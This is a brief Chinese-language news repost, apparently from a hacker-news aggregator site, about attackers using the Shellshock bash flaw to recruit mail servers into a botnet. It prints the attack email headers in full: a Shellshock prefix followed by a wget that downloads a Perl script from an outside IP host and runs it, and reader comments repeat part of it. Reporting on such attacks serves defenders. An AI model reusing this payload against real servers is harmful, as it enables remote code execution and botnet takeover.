攻击者利用Shellshock漏洞入侵邮件服务器

黑客接单访客2021-10-12 1:53:0010573A⁺A^-

　　攻击者正利用上个月披露的Shellshock漏洞入侵邮件服务器建立僵尸网络。

　　Shellshock漏洞是指攻击者向使用bash的Unix/Linux服务器发送精心构造的请求，诱骗bash远程执行命令。安全研究人员报告，攻击者向邮件服务器发送特定的消息头字段，诱骗服务器执行一个 Perl脚本，成为僵尸网络的一部分。

　　邮件消息头的构成是：

　　Message-ID：() { ：； }；wget -O /tmp/.legend hxxp：//190-94-251-41/legend.txt；killall -9 perl；perl /tmp/.legend

　　References：() { ：； }；wget -O /tmp/.legend hxxp：//190-94-251-41/legend.txt；killall -9 perl；perl /tmp/.legend

点击这里复制本文地址以上内容由黑资讯整理呈现，请务必在转载分享时注明本文地址！如对内容有疑问，请联系我们，谢谢！

馥妴路弥2022-06-03 20:25:16
　　攻击者正利用上个月披露的Shellshock漏洞入侵邮件服务器建立僵尸网络。　　Shellshock漏洞是指攻击者向使用bash的Unix/Linux服务器发送精心构造的请求，诱骗bash远程执行命令。安全研究人员报告，攻击者向邮件服务器发送

假欢零栀2022-06-03 19:24:55
　　攻击者正利用上个月披露的Shellshock漏洞入侵邮件服务器建立僵尸网络。　　Shellshock漏洞是指攻击者向使用bash的Unix/Linux服务器发送精心构造的请求，诱骗bash远程执行命令。安全研究人员报告，攻击者向邮件服务器发送特定的消息

寻妄寒洲2022-06-03 09:41:46
为僵尸网络的一部分。　　邮件消息头的构成是：　　Message-ID：() { ：； }；wget -O /tmp/.legend hxxp：//190-94-251-41/legend.txt；killall -9 perl；perl /tmp/.legend　　References：() { ：